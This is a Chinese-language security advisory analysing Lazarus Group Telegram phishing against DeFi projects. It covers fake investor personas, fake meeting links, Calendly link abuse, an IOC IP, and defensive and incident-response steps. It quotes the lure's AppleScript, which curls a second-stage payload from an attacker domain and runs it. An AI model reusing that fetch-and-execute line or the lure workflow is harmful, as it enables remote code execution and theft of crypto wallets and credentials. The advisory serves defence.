深度解析：朝鲜黑客针对加密货币项目的Telegram定点欺诈攻击

查找币:余老师 | 漏洞披露 | 2026-05-09 21:52 | 1 次浏览 | 0 条回复

查找币漏洞披露安全研究 Web3安全区块链安全

## 背景概述自2022年起，查找币安全团队通过BTI情报网络持续追踪发现，朝鲜Lazarus黑客组织正在大规模针对加密货币行业实施Telegram定点欺诈攻击。近期该组织升级攻击手段，开始冒充知名投资机构对DeFi项目方进行精准钓鱼。鉴于攻击态势持续升级，查找币安全团队在此进行技术剖析，帮助行业从业者提升防御能力。 ## 攻击技战法详解 ### 第一阶段：身份伪装与目标筛选攻击者首先选择具有行业影响力的知名投资机构作为冒充对象，通过以下步骤建立虚假身份： - **创建虚假Telegram账号**：精心伪造账号头像、昵称、简介，模仿真实投资机构人员的社交特征 - **收集目标信息**：通过公开渠道（如项目官网、社交媒体、GitHub）锁定知名DeFi项目方的核心成员联系方式 - **建立初步联系**：以“投资意向”为切入点主动发起聊天，测试目标的安全意识水平 ### 第二阶段：信任构建与会议诱骗一旦目标回应，攻击者会实施以下步骤： 1. **建立信任关系**：通过多轮对话伪装专业投资人，讨论项目细节、市场趋势等，降低目标警惕性 2. **发起会议邀请**：采用两种主要攻击手法： #### 手法一：恶意会议链接攻击攻击者提供形如 `*.group-meeting.team` 的虚假会议链接，目标点击后页面显示“地区访问限制”错误。此时攻击者会“热心”提供名为“修改定位”的恶意脚本（通常为AppleScript格式，如 `IP_Request.scpt`），诱导目标下载并执行。 **恶意脚本核心代码分析：** ```applescript set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting" set sc to do shell script "curl -L -k" & fix_url & "\"" run script sc ``` **技术原理：** - 脚本通过 `curl` 命令从远程服务器下载第二阶段恶意载荷 - `-L` 参数允许重定向，`-k` 参数跳过SSL证书验证，增强隐蔽性 - 下载的脚本通过 `run script` 直接执行，实现远程代码注入 - 攻击者可在后续载荷中植入键盘记录器、屏幕截图、浏览器凭证窃取等模块 #### 手法二：Calendly会议系统钓鱼攻击者利用知名会议预约平台Calendly的“添加自定义链接”功能，在预约事件中嵌入恶意链接。由于Calendly被广泛用于Web3行业的日常协作，这种攻击手法具有极强的迷惑性： - 恶意链接伪装成“会议资料”或“项目文档” - 点击后自动下载恶意可执行文件（如伪装成PDF或ZIP的恶意软件） - 一旦执行，攻击者即可获取目标系统的控制权或敏感信息 ### 第三阶段：资产窃取与持续控制成功植入后门后，攻击者将： - 监控目标电脑上的加密钱包、交易所账号、私钥文件 - 窃取浏览器中保存的密码和会话Cookie - 通过远程控制执行转账操作 ## 历史预警回顾查找币安全团队已于2023年11月30日通过BTI情报网络发布过相关攻击预警，当时识别的主要威胁指标（IOC）包括： - **恶意IP**：`104.168.137.21` - **关联域名**：攻击者使用的多个伪装会议域名 - **攻击样本**：包含AppleScript和PowerShell的恶意载荷 ## 防护建议与应急响应 ### 预防措施 1. **双重身份验证** - 对Telegram开启双重身份验证（2FA） - 添加好友前通过邮件、电话等第二渠道确认对方身份 2. **会议安全规范** - 拒绝运行任何第三方提供的脚本或可执行文件 - 使用官方会议平台（如Google Meet、Zoom）直接创建会议链接 - 警惕非标准域名（如 `.group-meeting.online`）的会议邀请 3. **系统安全加固** - 禁止在主要工作电脑上存储私钥和助记词 - 使用硬件钱包进行大额交易签名 - 定期更新操作系统和防病毒软件 ### 应急响应流程若发现已执行可疑脚本： 1. **立即断网**：拔掉网线或关闭Wi-Fi，阻断远程控制通道 2. **转移资产**：使用其他设备将受影响电脑上的加密资产转移到安全钱包 3. **系统清理**： - 运行全盘杀毒扫描（推荐使用Malwarebytes或Bitdefender） - 修改所有在受影响设备上登录过的账号密码（包括邮箱、交易所、社交平台） - 清除浏览器中保存的所有密码和会话 4. **专业取证**：联系查找币安全团队进行深度分析，获取攻击溯源线索 ## 总结当前针对Web3行业的Telegram钓鱼攻击已呈现出专业化、定制化、隐蔽化三大特征。攻击者不再使用广撒网的低级手段，而是针对高价值目标进行长达数周的社交工程。**在加密货币领域，安全意识就是最好的防火墙。** 项目方团队应建立严格的通信安全规范，对任何非预期的文件请求保持零信任态度。本文由查找币安全团队整理发布

深度解析：朝鲜黑客针对加密货币项目的Telegram定点欺诈攻击

查找币安全研究院

主题延伸阅读